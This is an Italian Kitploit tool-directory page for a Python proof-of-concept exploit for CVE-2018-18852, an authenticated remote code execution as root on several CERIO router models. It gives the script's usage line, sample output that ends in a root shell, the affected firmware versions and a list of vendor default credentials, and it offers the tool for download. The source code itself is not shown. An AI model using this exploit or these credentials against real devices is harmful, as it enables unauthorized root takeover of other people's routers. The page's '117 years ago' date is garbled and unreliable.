Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-18852 — CERIO RCE CVE-2018-18852, RCE autenticata (credenziali predefinite del vendor) basata sul web come utente root. | Kitploit
Strumenti/GitHubGitHub/andripwn/cve-2018-18852
Sicurezza Sistemi EmbeddedSicurezza IoTAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebStrumento di Accesso Remoto
GitHubandripwn/cve-2018-18852

CVE-2018-18852

CERIO RCE CVE-2018-18852, RCE autenticata (credenziali predefinite del vendor) basata sul web come utente root.

Vedi Repository
117 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC Python per RCE autenticata su router CERIO (credenziali backdoor del vendor) CVE-2018-18852

hook-s3c (github.com/andripwn), @andripwn su Twitter

PoC Python funzionante per CVE-2018-18852, originariamente apparso su; https://github.com/andripwn/CVE-2018-18852

Di cosa si tratta

I modelli e le varianti dei router CERIO, DT300N, DT100G, AMR-3204, WMR-200N, sono vulnerabili a una RCE autenticata via web come utente root.

Esiste come advisory 0day non divulgato; https://www.fortiguard.com/zeroday/FG-VD-18-149

Le credenziali predefinite del vendor sono solitamente presenti, quindi l'esecuzione è banale.

L'architettura è MIPS.

Utilizzo ed esempio

root@kitploit:~
Usage: exploit.py <ipaddress> <port> <creds>
root@kitploit:~

$ python ./exploit.py 127.0.0.1 8080 admin:admin

[*] ================================================
[*] CERIO RCE CVE-2018-18852, confirmed on;
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G       - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G     - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852
[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, 
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up
[*] ================================================

root@cerio:~# id
[!] This may not be the right model (DT-300N-NGS-M), trying again
[+] Sucessfully grabbed pid token: 1312


uid=0(root) gid=0(root)

root@cerio:~# 

Combinazioni di credenziali predefinite;

  • operator:1234
  • admin:admin
  • root:default

Saluti

Un saluto a vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee Andate a prendere Introducing Neals di YTCracker, l'abuso di potere del governo non è uno scherzo - svegliatevi, cazzo

HTP!!!! YEET

Scarica lo strumento